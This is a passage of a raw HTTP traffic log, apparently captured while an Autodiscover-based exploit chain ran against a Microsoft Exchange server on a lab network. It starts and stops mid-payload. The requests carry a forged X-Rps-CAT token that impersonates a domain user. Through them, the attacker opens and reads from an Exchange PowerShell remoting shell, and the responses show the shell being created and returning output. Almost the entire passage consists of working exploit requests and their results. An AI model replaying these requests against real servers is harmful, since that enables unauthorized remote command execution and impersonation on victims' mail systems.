AgIDxJMzIgTj0iS2V5Ij45PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI5Ij4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uU3RyaW5nPC9TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iViI+QzpcZGV2XGtpdGNoZW4tdmFncmFudDwvUz4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij44PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIxMCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0LlNpemU8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8T2JqIE49IlYiIFJlZklkPSIxMSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IndpZHRoIj4xOTk8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49ImhlaWdodCI+NTI8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgICAgPEkzMiBOPSJLZXkiPjc8L0kzMj4KICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjEyIj4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkhvc3QuU2l6ZTwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjEzIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0id2lkdGgiPjgwPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJoZWlnaHQiPjUyPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij42PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIxNCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0LlNpemU8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8T2JqIE49IlYiIFJlZklkPSIxNSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IndpZHRoIj44MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0iaGVpZ2h0Ij4yNTwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+NTwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMTYiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5TaXplPC9TPgogICAgICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWIiBSZWZJZD0iMTciPgogICAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJ3aWR0aCI+MjUwPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJoZWlnaHQiPjk5OTk8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgICAgPEkzMiBOPSJLZXkiPjQ8L0kzMj4KICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjE4Ij4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uSW50MzI8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IlYiPjI1PC9JMzI+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MzwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMTkiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5Db29yZGluYXRlczwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjIwIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieCI+MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieSI+OTk3NDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MjwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMjEiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5Db29yZGluYXRlczwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjIyIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieCI+MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieSI+OTk5ODwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MTwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMjMiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5Db25zb2xlQ29sb3I8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IlYiPjA8L0kzMj4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij4wPC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIyNCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLkNvbnNvbGVDb2xvcjwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0iViI+NzwvSTMyPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8L0RDVD4KICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICA8L01TPgogICAgICAgIDwvT2JqPgogICAgICAgIDxCIE49Il9pc0hvc3ROdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0VUlOdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0UmF3VUlOdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfdXNlUnVuc3BhY2VIb3N0Ij5mYWxzZTwvQj4KICAgICAgPC9NUz4KICAgIDwvT2JqPgogIDwvTVM+CjwvT2JqPgo=</creationXml></rsp:Shell></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: b3f69361-b6d4-487a-8b9d-f0f17d74c26a
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:43 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:43 GMT
Content-Length: 1640

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/CreateResponse</a:Action><a:MessageID>uuid:26B96A37-A801-4474-91B0-8FB1FF064AFB</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:1FA7A332-BF9E-41D5-A0A6-DB3445500A88</a:RelatesTo></s:Header><s:Body><x:ResourceCreated><a:Address>http://127.0.0.1/PowerShell/</a:Address><a:ReferenceParameters><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></a:ReferenceParameters></x:ResourceCreated><rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"><rsp:ShellId>F707CFC1-5849-4529-97C7-F492318D859C</rsp:ShellId><rsp:ResourceUri>http://schemas.microsoft.com/powershell/Microsoft.Exchange</rsp:ResourceUri><rsp:Owner>smcintyre@exchg.lan</rsp:Owner><rsp:ClientIP>fe80::d932:1cb5:5d16:a750%3</rsp:ClientIP><rsp:IdleTimeOut>PT900.000S</rsp:IdleTimeOut><rsp:InputStreams>stdin pr</rsp:InputStreams><rsp:OutputStreams>stdout</rsp:OutputStreams><rsp:ShellRunTime>P0DT0H0M0S</rsp:ShellRunTime><rsp:ShellInactivity>P0DT0H0M0S</rsp:ShellInactivity></rsp:Shell></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1765

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:FE83DD69-8F47-4213-9B12-7D873E9081C3</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 1a9d8a7f-9222-4ae7-83d8-7eb143495d3b
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:43 GMT
Content-Length: 1062

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:6887745C-4AFD-44DB-9F30-0ECCBA31B7D5</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:FE83DD69-8F47-4213-9B12-7D873E9081C3</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAUkAAAAAAAAAAAMAAADKAQAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48VmVyc2lvbiBOPSJwcm90b2NvbHZlcnNpb24iPjIuMzwvVmVyc2lvbj48VmVyc2lvbiBOPSJQU1ZlcnNpb24iPjIuMDwvVmVyc2lvbj48VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1765

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:841C11C9-E852-4B9B-BC34-B0122E7A70DD</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 4223ab81-dd50-480b-b8fa-6f49ab626c6e
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:43 GMT
Content-Length: 2694

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:D275C8B9-B25B-42AA-8009-E7DFDBA23975</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:841C11C9-E852-4B9B-BC34-B0122E7A70DD</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAUoAAAAAAAAAAAMAAAWSAQAAAAkQAgC6YAPcjEr4Tq3xAS9ylt/5AAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48T2JqIE49IkFwcGxpY2F0aW9uUHJpdmF0ZURhdGEiIFJlZklkPSIxIj48VE4gUmVmSWQ9IjAiPjxUPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNQcmltaXRpdmVEaWN0aW9uYXJ5PC9UPjxUPlN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxEQ1Q+PEVuPjxTIE49IktleSI+U3VwcG9ydGVkVmVyc2lvbnM8L1M+PFMgTj0iVmFsdWUiPjE1LjEuMjE3Ni4yPC9TPjwvRW4+PEVuPjxTIE49IktleSI+SW1wbGljaXRSZW1vdGluZzwvUz48T2JqIE49IlZhbHVlIiBSZWZJZD0iMiI+PFROUmVmIFJlZklkPSIwIiAvPjxEQ1Q+PEVuPjxTIE49IktleSI+SGFzaDwvUz48STMyIE49IlZhbHVlIj4tNDEzODg2MjU1PC9JMzI+PC9Fbj48L0RDVD48L09iaj48L0VuPjxFbj48UyBOPSJLZXkiPlBTVmVyc2lvblRhYmxlPC9TPjxPYmogTj0iVmFsdWUiIFJlZklkPSIzIj48VE5SZWYgUmVmSWQ9IjAiIC8+PERDVD48RW4+PFMgTj0iS2V5Ij5QU1ZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjUuMS4xNDM5My4zODY2PC9WZXJzaW9uPjwvRW4+PEVuPjxTIE49IktleSI+UFNFZGl0aW9uPC9TPjxTIE49IlZhbHVlIj5EZXNrdG9wPC9TPjwvRW4+PEVuPjxTIE49IktleSI+UFNDb21wYXRpYmxlVmVyc2lvbnM8L1M+PE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjQiPjxUTiBSZWZJZD0iMSI+PFQ+U3lzdGVtLlZlcnNpb25bXTwvVD48VD5TeXN0ZW0uQXJyYXk8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxMU1Q+PFZlcnNpb24+MS4wPC9WZXJzaW9uPjxWZXJzaW9uPjIuMDwvVmVyc2lvbj48VmVyc2lvbj4zLjA8L1ZlcnNpb24+PFZlcnNpb24+NC4wPC9WZXJzaW9uPjxWZXJzaW9uPjUuMDwvVmVyc2lvbj48VmVyc2lvbj41LjEuMTQzOTMuMzg2NjwvVmVyc2lvbj48L0xTVD48L09iaj48L0VuPjxFbj48UyBOPSJLZXkiPkNMUlZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjQuMC4zMDMxOS40MjAwMDwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPkJ1aWxkVmVyc2lvbjwvUz48VmVyc2lvbiBOPSJWYWx1ZSI+MTAuMC4xNDM5My4zODY2PC9WZXJzaW9uPjwvRW4+PEVuPjxTIE49IktleSI+V1NNYW5TdGFja1ZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjMuMDwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPlBTUmVtb3RpbmdQcm90b2NvbFZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjIuMzwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPlNlcmlhbGl6YXRpb25WZXJzaW9uPC9TPjxWZXJzaW9uIE49IlZhbHVlIj4xLjEuMC4xPC9WZXJzaW9uPjwvRW4+PC9EQ1Q+PC9PYmo+PC9Fbj48L0RDVD48L09iaj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1765

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:B5A2269A-C1FA-460C-82C5-0E3433F33BA1</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 39938043-99f3-4786-b7be-b8d5797ade01
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:43 GMT
Content-Length: 930

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:894AD1DE-0B80-4F9D-B3F0-D69EF16EA3F6</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:B5A2269A-C1FA-460C-82C5-0E3433F33BA1</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream 